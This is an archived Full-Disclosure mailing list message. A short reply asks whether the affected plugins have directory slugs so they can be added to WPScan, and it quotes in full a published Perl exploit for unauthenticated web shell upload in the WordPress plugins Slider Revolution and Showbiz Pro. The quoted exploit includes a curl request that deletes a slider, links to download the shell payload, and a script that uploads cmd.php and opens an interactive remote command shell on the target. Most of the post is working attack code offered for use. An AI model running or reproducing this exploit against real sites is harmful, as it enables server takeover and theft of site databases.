lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAHw3cgSmZVL0v32SOeV8j+37e8YkHL1dSYTGmdz=mN2+ybN5ew@mail.gmail.com> Date: Wed, 26 Nov 2014 10:15:52 +0100 From: Ryan Dewhurst <ryandewhurst@...il.com> To: Simo Ben youssef <simo@...xploit.com> Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: Re: [FD] Slider Revolution/Showbiz Pro shell upload exploit Do you know if revslider and showbiz create a /wp-content/plugins/revslider/ and /wp-content/plugins/showbiz/ directories? It is so that we can add them as 'slugs' for WPScan (http://wpscan.org) and WPVULNDB (https://wpvulndb.com). On Tue, Nov 25, 2014 at 5:37 PM, Simo Ben youssef <simo@...xploit.com> wrote: > #!/usr/bin/perl > # > # Title: Slider Revolution/Showbiz Pro shell upload exploit > # Author: Simo Ben youssef > # Contact: Simo_at_Morxploit_com > # Discovered: 15 October 2014 > # Coded: 15 October 2014 > # Updated: 25 November 2014 > # Published: 25 November 2014 > # MorXploit Research > # http://www.MorXploit.com > # Vendor: ThemePunch > # Vendor url: http://themepunch.com > # Software: Revslider/Showbiz Pro > # Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro) > # Products url: > # > http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 > # > http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988 > # Vulnerable scripts: > # revslider/revslider_admin.php > # showbiz/showbiz_admin.php > # > # About the plugins: > # The #1 Slider plugin, used by millions, slider revolution is an > all-purpose slide displaying solution that allows for showing almost any > # kind of content whith highly customizable, transitions, effects and > custom animations. > # Showbiz Pro is a responsive teaser displaying solution that allows you > to show WordPress Posts or any Custom Content with a set > # amount of teaser items. > # > # Description: > # Slider Revolution and Showbiz Pro fail to check authentication in > revslider_admin.php/showbiz_admin.php allowing an unauthenticated > # attacker to abuse administrative features. > # Some of the features include: > # Creating/Deleting/Updating sliders > # Importing/exporting sliders > # Updading plugin > # For a full list of functions please see > revslider_admin.php/showbiz_admin.php > # > # PoC on revslider: > # 1- Deleting a slider: > # root@...t:/home/rootuser# curl -v --data > "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" > # http://****.com/wp-admin/admin-ajax.php > # * Connected to ****.com (**.**.**.**) port 80 (#0) > #> POST /wp-admin/admin-ajax.php HTTP/1.1 > #> User-Agent: curl/7.35.0 > #> Host: ****.com > #> Accept: */* > #> Content-Length: 73 > #> Content-Type: application/x-www-form-urlencoded > #> > # * upload completely sent off: 73 out of 73 bytes > # < HTTP/1.1 200 OK > # < Date: Fri, 24 Oct 2014 23:25:07 GMT > # * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 > mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted > # < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips > mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 > # < X-Powered-By: PHP/5.4.18 > # < X-Robots-Tag: noindex > # < X-Content-Type-Options: nosniff > # < Expires: Wed, 11 Jan 1984 05:00:00 GMT > # < Cache-Control: no-cache, must-revalidate, max-age=0 > # < Pragma: no-cache > # < X-Frame-Options: SAMEORIGIN > # < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/ > # < Transfer-Encoding: chunked > # < Content-Type: text/html; charset=UTF-8 > # < > # * Connection #0 to host http://****.com left intact > # > # {"success":true,"message":"The slider > deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"} > # > # 2- Uploading an web shell: > # The following perl exploit will try to upload an HTTP php shell through > the the update_plugin function > # To use the exploit make sure you download first the revslider.zip and > showbiz.zip files which contain cmd.php > # http://www.morxploit.com/morxploits/revslider.zip > # http://www.morxploit.com/morxploits/showbiz.zip > # and save them it in the same directory where you have the exploit. > # > # Demo: > # perl morxrev.pl http://localhost revslider > # =================================================== > # --- Revslider/Showbiz shell upload exploit > # --- By: Simo Ben youssef <simo_at_morxploit_com> > # --- MorXploit Research www.MorXploit.com > # =================================================== > # [*] Target set to revslider > # [*] MorXploiting http://localhost > # [*] Sent payload > # [+] Payload successfully executed > # [*] Checking if shell was uploaded > # [+] Shell successfully uploaded > # > # Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC > 2014 x86_64 x86_64 x86_64 GNU/Linux > # uid=33(www-data) gid=33(www-data) groups=33(www-data) > # > # www-data@...Xploit:~$ > # > # Download: > # Exploit: > # http://www.morxploit.com/morxploits/morxrevbiz.pl > # Exploit update zip files: > # http://www.morxploit.com/morxploits/revslider.zip > # http://www.morxploit.com/morxploits/showbiz.zip > # > # Requires LWP::UserAgent > # apt-get install libwww-perl > # yum install libwww-perl > # perl -MCPAN -e 'install Bundle::LWP' > # For SSL support: > # apt-get install liblwp-protocol-https-perl > # yum install perl-Crypt-SSLeay > # > # Mitigation: > # Besides the recently LFI vulnerability that was published couple months > ago, this is another vulnerability that revslider developers have > # decided to patch without releasing a full security advisory, leaving > thousands of revslider users who didn't update their plugin to the > # latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders > developers will argue the fact that their slider comes with an > # auto-update feature, but the problem is that this plugin is bundled with > a lot of themes, which means that those themes users may not get > # plugin updates or will have to pay to get the update. In other words > revslider developers believe that every user should have the > # auto-update feature on, otherwise ... you are screwed. > # Obviously this is way more critical than the LFI vulnerability because > it allows shell access giving attackers access to the target system > # as well as the ability to dump the entire wordpress database locally. > # That being said, upgrade immediately to the latest version or > disable/switch to another plugin. > # As for Showbiz Pro, sadly the vulnerability has never been patched as we > successfully exploited it in the latest version (1.7.1). > # > # Author disclaimer: > # The information contained in this entire document is for educational, > demonstration and testing purposes only. > # Author cannot be held responsible for any malicious use or damage. Use > at your own risk. > # > # Got comments or questions? > # Simo_at_MorXploit_dot_com > # > # Did you like this exploit? > # Feel free to buy me a beer =) > # My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u > # Cheers! > > use LWP::UserAgent; > use MIME::Base64; > use strict; > > sub banner { > system(($^O eq 'MSWin32') ? 'cls' : 'clear'); > print "===================================================\n"; > print "--- Revslider/Showbiz shell upload exploit\n"; > print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; > print "--- MorXploit Research www.MorXploit.com\n"; > print "===================================================\n"; > } > > if (!defined ($ARGV[0] && $ARGV[1])) { > banner(); > print "perl $0 <target> <plugin>\n"; > print "perl $0 http://localhost revslider\n"; > print "perl $0 http://localhost showbiz\n"; > exit; > } > > my $zip1 = "revslider.zip"; > my $zip2 = "showbiz.zip"; > > unless (-e ($zip1 && $zip2)) > { > banner(); > print "[-] $zip1 or $zip2 not found! RTFM\n"; > exit; > } > > my $host = $ARGV[0]; > my $plugin = $ARGV[1]; > my $action; > my $update_file; > > if ($plugin eq "revslider") { > $action = "revslider_ajax_action"; > $update_file = "$zip1"; > } > elsif ($plugin eq "showbiz") { > $action = "showbiz_ajax_action"; > $update_file = "$zip2"; > } > else { > banner(); > print "[-] Wrong plugin name\n"; > print "perl $0 <target> <plugin>\n"; > print "perl $0 http://localhost revslider\n"; > print "perl $0 http://localhost showbiz\n"; > exit; > } > my $target = "wp-admin/admin-ajax.php"; > my $shell = > "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; > > sub randomagent { > my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 > Firefox/31.0', > 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', > 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', > 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like > Gecko) Chrome/37.0.2049.0 Safari/537.36', > 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like > Gecko) Chrome/36.0.1985.67 Safari/537.36', > 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) > Chrome/26.0.1410.63 Safari/537.31' > ); > my $random = $array[rand @array]; > return($random); > } > my $useragent = randomagent(); > > my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); > $ua->timeout(10); > $ua->agent($useragent); > my $status = $ua->get("$host/$target"); > unless ($status->is_success) { > banner(); > print "[-] Xploit failed: " . $status->status_line . "\n"; > exit; > } > > banner(); > print "[*] Target set to $plugin\n"; > print "[*] MorXploiting $host\n"; > > my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => > "form-data", Content => [action => "$action", client_action => > "update_plugin", update_file => ["$update_file"]]); > > print "[*] Sent payload\n"; > > if ($exploit->decoded_content =~ /Wrong update extracted folder/) { > print "[+] Payload successfully executed\n"; > } > > elsif ($exploit->decoded_content =~ /Wrong request/) { > print "[-] Payload failed: Not vulnerable\n"; > exit; > } > > elsif ($exploit->decoded_content =~ m/0$/) { > print "[-] Payload failed: Plugin unavailable\n"; > exit; > } > > else { > $exploit->decoded_content =~ /<\/b>(.*?)<br>/; > print "[-] Payload failed:$1\n"; > print "[-] " . $exploit->decoded_content unless (defined $1); > print "\n"; > exit; > } > > print "[*] Checking if shell was uploaded\n"; > > sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] } > my $rndstr = rndstr(8, 1..9, 'a'..'z'); > my $cmd1 = encode_base64("echo $rndstr"); > my $status = $ua->get("$host/$shell?cmd=$cmd1"); > > if ($status->decoded_content =~ /system\(\) has been disabled/) { > print "[-] Xploit failed: system() has been disabled\n"; > exit; > } > > elsif ($status->decoded_content !~ /$rndstr/) { > print "[-] Xploit failed: " . $status->status_line . "\n"; > exit; > } > > elsif ($status->decoded_content =~ /$rndstr/) { > print "[+] Shell successfully uploaded\n"; > } > my $cmd2 = encode_base64("whoami"); > my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); > my $cmd3 = encode_base64("uname -n"); > my $uname = $ua->get("$host/$shell?cmd=$cmd3"); > my $cmd4 = encode_base64("id"); > my $id = $ua->get("$host/$shell?cmd=$cmd4"); > my $cmd5 = encode_base64("uname -a"); > my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); > print $unamea->decoded_content; > print $id->decoded_content; > my $wa = $whoami->decoded_content; > my $un = $uname->decoded_content; > chomp($wa); > chomp($un); > > while () { > print "\n$wa\@$un:~\$ "; > chomp(my $cmd=<STDIN>); > if ($cmd eq "exit") > { > print "Aurevoir!\n"; > exit; > } > my $ucmd = encode_base64("$cmd"); > my $output = $ua->get("$host/$shell?cmd=$ucmd"); > print $output->decoded_content; > } > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists